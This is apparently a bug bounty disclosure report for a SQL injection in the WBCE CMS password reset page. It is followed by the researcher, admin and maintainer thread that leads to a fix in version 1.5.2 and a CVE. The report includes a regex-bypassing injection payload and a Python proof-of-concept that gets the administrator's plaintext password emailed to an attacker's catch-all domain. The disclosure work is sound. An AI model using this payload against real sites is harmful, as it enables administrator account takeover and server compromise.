SQL Injection in wbce/wbce_cms

Valid

Reported on

Nov 27th 2021


Description

Plaintext administrator password recovery vulnerability due to SQL injection in password reset page.

admin/login/forgot/index.php lines 33-34:

$sSql = "SELECT * FROM `{TP}users` WHERE `email` = '" . $email . "'";
$rRow = $database->query($sSql);

Due to poor email validation attacker can inject arbitrary SQL queries and recover administrator password.

admin/login/forgot/index.php, lines 26-30:

$email = strip_tags($wb->get_post('email'));
    if ($admin->validate_email($email) == false) {
        $oMsgBox->error($MESSAGE['USERS_INVALID_EMAIL']);
        $email = '';
    }

validate_email function which is located in framework/class.wb.php, lines 617-631:

public function validate_email($email)
    {
        if (function_exists('idn_to_ascii')) {
            // use pear if available
            $email = @idn_to_ascii($email);
        } else {
            require_once WB_PATH . '/include/idna_convert/idna_convert.class.php';
            $IDN = new idna_convert();
            $email = $IDN->encode($email);
            unset($IDN);
        }
        // regex from NorHei 2011-01-11
        $retval = preg_match("/^((([!#$%&'*+\\-\/\=?^_`{|}~\w])|([!#$%&'*+\\-\/\=?^_`{|}~\w][!#$%&'*+\\-\/\=?^_`{|}~\.\w]{0,}[!#$%&'*+\\-\/\=?^_`{|}~\w]))[@]\w+(([-.]|\-\-)\w+)*\.\w+(([-.]|\-\-)\w+)*)$/", $email);
        return ($retval != false);
    }

Regex filtering can't be optimal protection for SQL injection...

Steps to reproduce:

1.First we need to select administrator from users table, using this payload: '/**/or/**/user_id=1/**/or/**/'random@pylibs.org (Which will bypass regex filtering in class.wb.php)

2.Even if we have no control of administrator's email, we can send it to another email.

admin/login/forgot/index.php lines 76-77:

// Setup email to send
$mail_to = $email;

Payload that I used can be real email address, on the other hand it can inject SQL query and select administrator from users table. In this example I used pylibs.org domain and installed forwarder for all emails to dectavianus07@gmail.com.

Proof of Concept

// PoC.py
import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from my localhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to recevice plaintext password which belongs to administrator :)')
  1. In the end, you should receive email from vulnerable endpoit to '/**/or/**/user_id=1/**/or/**/'random@yourdomainname.com email

Impact

Authentication bypass for this web application is like preauth RCE, as authenticated administrator can easily run php scripts using templates or uploading new modules.

Occurrences

We are processing your report and will contact the wbce/wbce_cms team within 24 hours. a year ago
maxway2021 submitted a
a year ago
maxway2021
a year ago

Researcher


Can I get CVE ID... I am curious about it right now :)

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
maxway2021
a year ago

Researcher


@admin can we invite any other people to this page? I contacted with vendor they are asking about vulnerability details. I think it's better to see by vendor in this page so I won't copy all information

Jamie Slome
a year ago

Admin


@maxway2021 - feel free to share the URL for this page with others. It is protected, and so only users with maintainer permissions can view your report.

I have tagged you in a comment on GitHub responding to the maintainers.

Regarding the CVE, we can assign a CVE if the maintainer is also happy to do so once the report has been marked as valid and fixed.

Let me know if you have any further questions, and happy to help ­čĹő

maxway2021
a year ago

Researcher


They already fixed the vulnerability before I reach out

Jamie Slome
a year ago

Admin


We just need to wait for the maintainer to come on platform and confirm this as well.

maxway2021
a year ago

Researcher


I shared the link with vendors, I think they will respond soon.

Jamie Slome
a year ago

Admin


Great ­čĹŹ

We have contacted a member of the wbce/wbce_cms team and are waiting to hear back a year ago
A wbce/wbce_cms maintainer
a year ago

Maintainer


confirmed. Fixed in https://github.com/WBCE/WBCE_CMS/commit/6ca63f0cad5f0cd606fdb69a372f09b7d238f1d7

we will release WBCE CMS 1.5.2 tomorrow

A wbce/wbce_cms maintainer validated this vulnerability a year ago
maxway2021 has been awarded the disclosure bounty
The fix bounty is now up for grabs
maxway2021
a year ago

Researcher


@admin now you can assign CVE, can't you

maxway2021
a year ago

Researcher


oh well I think you will assign CVE after fix okay understood ­čśů

maxway2021
a year ago

Researcher


@admin WBCE CMS 1.5.2 (fixed version) released

Jamie Slome
a year ago

Admin


Exactly, we just require the maintainer to confirm the commit SHA that fixes the vulnerability via the platform.

A wbce/wbce_cms maintainer
a year ago

Maintainer


What am I supposed to do? Click on the green button top right?

And please allow the WBCE users an appropriate time to fix their installation before disclosing this vulnerability.

Jamie Slome
a year ago

Admin


@maintainer - when you are ready to make this report public, please click the confirm fix button, where you will be asked to provide a commit SHA and patched version.

Just for clarity, once this report is "fixed", it will be visible to the public.

maxway2021
a year ago

Researcher


@admin what about requesting CVE identification

Jamie Slome
a year ago

Admin


We will arrange this once the fix has been confirmed and the maintainer is happy for a CVE to be published for this report.

It seems that the maintainer would like a small delay in taking the report public + publishing a CVE, so that the community can fix their vulnerable installations.

maxway2021
a year ago

Researcher


ok

A wbce/wbce_cms maintainer marked this as fixed in 1.5.2 with commit 6ca63f a year ago
maxway2021 has been awarded the fix bounty
This vulnerability will not receive a CVE
index.php#L33 has been validated
maxway2021
a year ago

Researcher


@admin can we assign CVE now

maxway2021
a year ago

Researcher


I mean request to assign a CVE ID

maxway2021
a year ago

Researcher


please

maxway2021
a year ago

Researcher


@maintainer I think this is the best way to inform about criticial vulnerability to users. It will help users to know why they should update the system asap.

Jamie Slome
a year ago

Admin


@maxway2021 - we can, we just need the go-ahead from the maintainer, and we can arrange this for you. We will wait for the maintainer to respond and share their thoughts ­čĹŹ

A wbce/wbce_cms maintainer
a year ago

Maintainer


We have informed our users as best as we can (website, forum, newsletter, update information in the backend) and gave them 7 days to update. So yes, you can go ahead creating a CVE ID.

Jamie Slome
a year ago

Admin


Great, I will go ahead and arrange this now!

Jamie Slome
a year ago

Admin


CVE published: CVE-2021-3817 ­čÄŐ

maxway2021
a year ago

Researcher


Finally ­čśâ Thank you everyone!

Jamie Slome
a year ago

Admin


Great work!

to join this conversation